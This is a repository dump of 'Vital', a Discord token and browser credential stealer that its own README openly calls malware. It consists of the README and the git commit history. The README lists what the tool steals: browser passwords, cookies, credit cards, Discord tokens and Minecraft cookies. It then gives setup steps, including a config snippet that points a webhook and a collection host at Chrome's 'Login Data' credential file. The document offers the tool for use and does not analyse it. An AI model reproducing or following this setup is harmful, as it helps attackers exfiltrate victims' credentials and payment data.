======================: FILES :======================
======================: README CONTENT :======================
# Vital
- What is Vital?
  > Vital is malware primarily used to collect and
  > extract information from the Discord desktop client.
  > While it has other features (MC stealer, browser tools)
  > it really shines in this area.

- Overview of Vital
  > Vital has the ability to steal browser passwords, cookies, and credit cards.
  > It also collects Discord tokens, Minecraft client cookies and can redirect
  > the Discord client to an alternative web address.

- Support / coverage
  > Vital supports a plethora of Discord clients and browsers,
  > from commonly used browsers such as Chrome and Firefox to
  > lesser used browsers such as (i don't know)

# Usage
Setup a webserver on either a local machine or a remote machine, hosting the
PHP file. Once you have your local server setup, make sure to configure everything
**__properly__** inside of `main.py`. 

- Example
```python
WEBHOOK 	    = 	'https://discord.com/webhooks/idontfuckingknow'
REDIRECT 	    = 	''
HOST	 	    = 	'http://mydomain.org/'
CHROME_DATA 	    =   '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data'
USERNAME	    =   os.environ.get('USERNAME')
APPDATA		    =   os.getenv('APPDATA')

DEBUG 		    = 	False
```

After this you can execute `main.py` and watch the magic happen!
====================== GIT HISTORY: ======================
837ecb5 HEAD@{0}: clone: from https://github.com/rpie/Vital
commit 837ecb5aeb6dbcdfa510c69a589134f895a08b47
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Dec 28 01:35:54 2021 +0700

    Update main.py
    
    Fixed outline F String bug

commit 8030e494b01af2a482e7d9a5364a70fb35697199
Merge: 1f6071c 96172bf
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Dec 28 01:09:55 2021 +0700

    Merge pull request #4 from AstroOrbis/main
    
    Formatting updates and other cool stuff

commit 96172bf54f203fed6bad9362289009f2a40aa04d
Author: Astro Orbis <astroorbis@gmail.com>
Date:   Tue Nov 30 14:29:16 2021 -0500

    Formatting updates and other cool stuff

commit 1f6071c27e611ace54643c6300da1f8b2f2c45c6
Merge: 9ec24db f04060a
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Oct 19 14:15:38 2021 +0000

    Merge pull request #3 from 0x44F/main
    
    Code cleanup #0001 from 0x44F

commit f04060a3d4615941a2a110e7a972148497446560
Author: 0x44F <89411010+0x44F@users.noreply.github.com>
Date:   Wed Oct 13 02:53:05 2021 +1300

    Update index.php

commit e2a032c687ee6d7a0cb63d9c0ff26c1b7490d8b2
Author: 0x44F <89411010+0x44F@users.noreply.github.com>
Date:   Wed Oct 13 02:51:13 2021 +1300

    Create functions.php

commit 90c02e9157f66d3c8978dca794eb514530785cda
Author: 0x44F <89411010+0x44F@users.noreply.github.com>
Date:   Wed Oct 13 02:39:45 2021 +1300

    Update README.md

commit fa7a1fd3b60fd8b82f93893305e3047662d77442
Author: 0x44F <89411010+0x44F@users.noreply.github.com>
Date:   Wed Oct 13 02:37:39 2021 +1300

    Update README.md

commit a8ea720acaf377d81d37876c6b43b43cfcec643e
Author: 0x44F <89411010+0x44F@users.noreply.github.com>
Date:   Tue Oct 12 21:32:54 2021 +1300

    Update main.py

commit 6ea24d8b71382c30870b87e8d4bfec3eb9c3b062
Author: 0x44F <89411010+0x44F@users.noreply.github.com>
Date:   Mon Oct 11 21:54:39 2021 +1300

    Update main.py

commit 0f2209e388d83c7ffd39ee6838d0df5a953e3957
Author: 0x44F <89411010+0x44F@users.noreply.github.com>
Date:   Mon Oct 11 21:28:25 2021 +1300

    Cleanup code

commit 9ec24db88e1eea58da58c76d912b7e81c20149ef
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Sat Oct 9 08:15:12 2021 -0900

    Delete index.md

commit ce5ff3b205543a02849afa4aa7720483155ec8fa
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Sat Oct 9 08:14:47 2021 -0900

    Create index.md

commit a208eaeb87bac03cdccfe1619177696d08c65a25
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Fri Oct 8 09:18:24 2021 -0900

    Update README.md

commit 105ec8c970c4aac7ddfa82257839b12d2fc8328e
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Fri Oct 8 09:18:04 2021 -0900

    Update README.md

commit 3e62fa2e3b4ace37a3ecc1ef153bd130a9d24149
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Wed Sep 29 09:50:47 2021 -0900

    Update README.md

commit 58531f44793027f708ba6f6ca69d69934ec59f25
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Wed Sep 29 04:50:45 2021 -0900

    Update README.md

commit f3d3ada8a998cc7194ad1f55173b0475362d6d20
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Wed Sep 29 04:43:57 2021 -0900

    Update README.md

commit 8631b1274a2d592c2187f2d7a6ebf0f3d0f42df5
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Wed Sep 29 04:41:33 2021 -0900

    Update README.md

commit 07b55e29f1be69d717dece6b02d596e21e7cd03b
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Wed Sep 29 04:41:12 2021 -0900

    Update main.py

commit b450bf16a053467dbdca0afe119cefbdb41b69f8
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Wed Sep 29 04:36:13 2021 -0900

    Update README.md

commit 64b2369e1cce53caf16df2e2364e2869483d90f1
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Sep 28 20:09:58 2021 -0900

    Update README.md

commit 259753987f4274e4c10ee4fd4ce5b75020020b22
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Sep 28 20:05:44 2021 -0900

    Update README.md

commit 4feb5776b6582f89a2a2689a1dc31a9846c444bc
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Sep 28 20:04:42 2021 -0900

    Update README.md

commit e90f6cc011ab526b24a14e759c1e0c06b231cec2
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Sep 28 19:55:46 2021 -0900

    Update README.md

commit 5dd8e251a3a5e80275ca42a58474424b538d0634
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Sep 28 19:50:25 2021 -0900

    Create injection.js

commit 88f2523ec6c110e510d39a69cd11b004aa5aa999
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Wed Sep 29 04:50:10 2021 +0000

    Add files via upload

commit 0e6da6e70da99474ed9923a34313678862db7928
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Sep 28 19:49:32 2021 -0900

    Create main.py

commit 137096fbf71ee0dafa44b188ad4a0a167b731005
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Sep 28 19:30:53 2021 -0900

    Update README.md

commit 50acbb57457865170e7e04fa5712da70d4359a93
Author: HellSec <57877984+rpie@users.noreply.github.com>
Date:   Tue Sep 28 19:30:36 2021 -0900

    Initial commit
